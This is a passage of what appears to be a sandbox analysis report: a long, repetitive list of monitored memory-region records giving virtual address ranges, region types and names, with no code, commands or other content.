name = "pagefile_0x0000000000610000" filename = "" Region: id = 18422 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18423 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18424 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18425 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18426 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18427 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18428 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18429 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18430 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18431 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18432 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18433 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18434 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18435 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18436 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18437 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18438 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18439 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18440 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18441 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18442 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18443 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18444 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18445 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18446 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18447 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18448 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18449 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18450 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18451 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18452 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18453 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18454 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18455 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18456 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18457 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18458 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18459 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18460 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18461 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18462 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18463 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18464 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18465 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18466 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18467 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18468 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18469 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18470 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18471 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18472 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18473 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18474 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18475 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18476 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18477 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18478 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18479 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18480 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18481 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18482 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18483 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18484 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18485 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18486 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18487 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18488 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18489 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18490 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18491 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18492 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18493 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18494 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18495 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18496 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18497 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18498 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18499 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18500 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18501 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18502 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18503 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18504 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18505 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18506 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18507 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18508 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18509 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18510 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18511 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18512 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18513 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18514 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18515 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18516 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18517 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18518 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18519 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18520 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18521 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18522 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18523 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18524 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18525 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18526 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18527 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18528 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18529 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18530 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18531 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18532 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18533 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18534 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18535 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18536 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18537 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18538 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18539 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18540 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18541 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 18542 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18543 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18544 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18545 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18546 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18547 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18548 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18549 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18550 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18551 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18552 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18553 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18554 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18555 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18556 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18557 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18558 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18559 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18560 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18561 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18562 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18563 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18564 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18565 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18566 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18567 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18568 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18569 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18570 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18571 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18572 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18573 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18574 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18575 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18576 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18577 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18578 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18579 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18580 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18581 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18582 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18583 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18584 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18585 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18586 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18587 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18588 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18589 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18590 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18591 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18592 start_va = 0x49d0000 end_va = 0x49f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 18593 start_va = 0x4a00000 end_va = 0x4a21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 18594 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18595 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18596 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18597 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18598 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 18599 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18600 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18601 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18602 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18603 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18604 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18605 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18606 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18607 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18608 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18609 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18610 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18611 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = 